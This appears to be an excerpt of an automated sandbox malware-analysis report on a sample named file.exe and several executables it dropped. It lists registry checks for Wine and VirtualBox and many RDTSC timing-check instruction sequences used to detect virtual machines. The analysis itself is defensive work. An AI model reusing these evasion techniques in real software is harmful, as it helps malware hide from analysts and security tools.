Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEEE6 second address: AFEF02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86A67 second address: C86A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86A6E second address: C86A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1BE47673C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85CE2 second address: C85CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85CEC second address: C85D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85D02 second address: C85D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85D08 second address: C85D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F1BE47673CAh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E8B second address: C85E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F1BE4ECC066h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88866 second address: C8886A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C889F6 second address: C889FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C889FD second address: C88A5A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BE47673CCh 0x00000008 jns 00007F1BE47673C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F1BE47673C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d or dword ptr [ebp+122D3180h], esi 0x00000033 push 00000000h 0x00000035 add di, 3EB7h 0x0000003a call 00007F1BE47673C9h 0x0000003f push edi 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jg 00007F1BE47673C6h 0x00000049 popad 0x0000004a pop edi 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jp 00007F1BE47673C6h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88A5A second address: C88A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F1BE4ECC066h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B5E second address: C88B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B62 second address: C88B6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B6C second address: C88B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88C8E second address: C88D13 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1BE4ECC068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 24806AFCh 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F1BE4ECC068h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2A79h], edi 0x00000033 push 00000003h 0x00000035 and edi, dword ptr [ebp+122D3C02h] 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D3B12h] 0x00000043 push 00000003h 0x00000045 push E60F95BEh 0x0000004a push edi 0x0000004b push esi 0x0000004c jnp 00007F1BE4ECC066h 0x00000052 pop esi 0x00000053 pop edi 0x00000054 xor dword ptr [esp], 260F95BEh 0x0000005b sub cl, 0000001Eh 0x0000005e lea ebx, dword ptr [ebp+1245D7ECh] 0x00000064 sub esi, dword ptr [ebp+122D1F3Bh] 0x0000006a xchg eax, ebx 0x0000006b jmp 00007F1BE4ECC071h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88D13 second address: C88D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B99A second address: C9B9AA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B9AA second address: C9B9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F1BE47673CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8722 second address: CA872C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC07Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CBB second address: CA8CD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1BE47673CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jl 00007F1BE47673EDh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CD6 second address: CA8CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CDC second address: CA8CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F76 second address: CA8F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F7A second address: CA8F8E instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BE47673C6h 0x00000008 jmp 00007F1BE47673CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F8E second address: CA8F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F94 second address: CA8F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA929E second address: CA92A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A06 second address: CA0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A0A second address: CA0A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A10 second address: CA0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A14 second address: CA0A21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A21 second address: CA0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673D2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1BE47673C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C41B second address: C7C423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C423 second address: C7C434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C434 second address: C7C439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C439 second address: C7C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB05E1 second address: CB05FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF335 second address: CAF34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1BE47673CBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF34A second address: CAF34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0CF4 second address: CB0D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F1BE47673D7h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D2A second address: CB0D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D2E second address: CB0D3D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D3D second address: CB0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D43 second address: CB0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB548C second address: CB5492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5492 second address: CB5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5496 second address: CB549A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB549A second address: CB54A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5871 second address: CB5875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5875 second address: CB5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F1BE47673CEh 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F1BE47673C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5897 second address: CB589D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB589D second address: CB58A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB58A1 second address: CB58C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F1BE4ECC066h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B60 second address: CB5B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B69 second address: CB5B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B6F second address: CB5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B73 second address: CB5BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC075h 0x00000007 jmp 00007F1BE4ECC073h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1BE4ECC074h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB790E second address: CB7912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7912 second address: CB7927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB79CE second address: CB79D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB79D4 second address: CB7A29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F1BE4ECC066h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F1BE4ECC072h 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push edi 0x0000001a jnc 00007F1BE4ECC066h 0x00000020 pop edi 0x00000021 js 00007F1BE4ECC07Eh 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A29 second address: CB7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A2D second address: CB7A63 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pop eax 0x0000000c clc 0x0000000d call 00007F1BE4ECC069h 0x00000012 jmp 00007F1BE4ECC075h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F1BE4ECC068h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A63 second address: CB7A86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE47673D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A86 second address: CB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7D7F second address: CB7D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7D83 second address: CB7D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1BE4ECC06Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F0B second address: CB7F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F11 second address: CB7F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F15 second address: CB7F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F30 second address: CB7F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB868A second address: CB8690 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8690 second address: CB869A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB869A second address: CB86B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F1BE47673C8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1BE47673CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8764 second address: CB876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB876A second address: CB876F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB876F second address: CB8775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8775 second address: CB8788 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F1BE47673D9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAD18 second address: CBAD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9AD0 second address: CB9AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9AD4 second address: CB9ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9ADA second address: CB9ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB38D second address: CBB3A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB3A9 second address: CBB3B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB3B9 second address: CBB3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBDB74 second address: CBDB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBDB7A second address: CBDB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE69C second address: CBE70F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1BE47673D9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2877h] 0x00000014 push 00000000h 0x00000016 jmp 00007F1BE47673D0h 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e mov dword ptr [ebp+1246D7CDh], esi 0x00000024 sub dword ptr [ebp+122D5CC3h], ecx 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d pushad 0x0000002e jne 00007F1BE47673C6h 0x00000034 jmp 00007F1BE47673D4h 0x00000039 popad 0x0000003a pop eax 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jbe 00007F1BE47673C6h 0x00000045 rdtsc
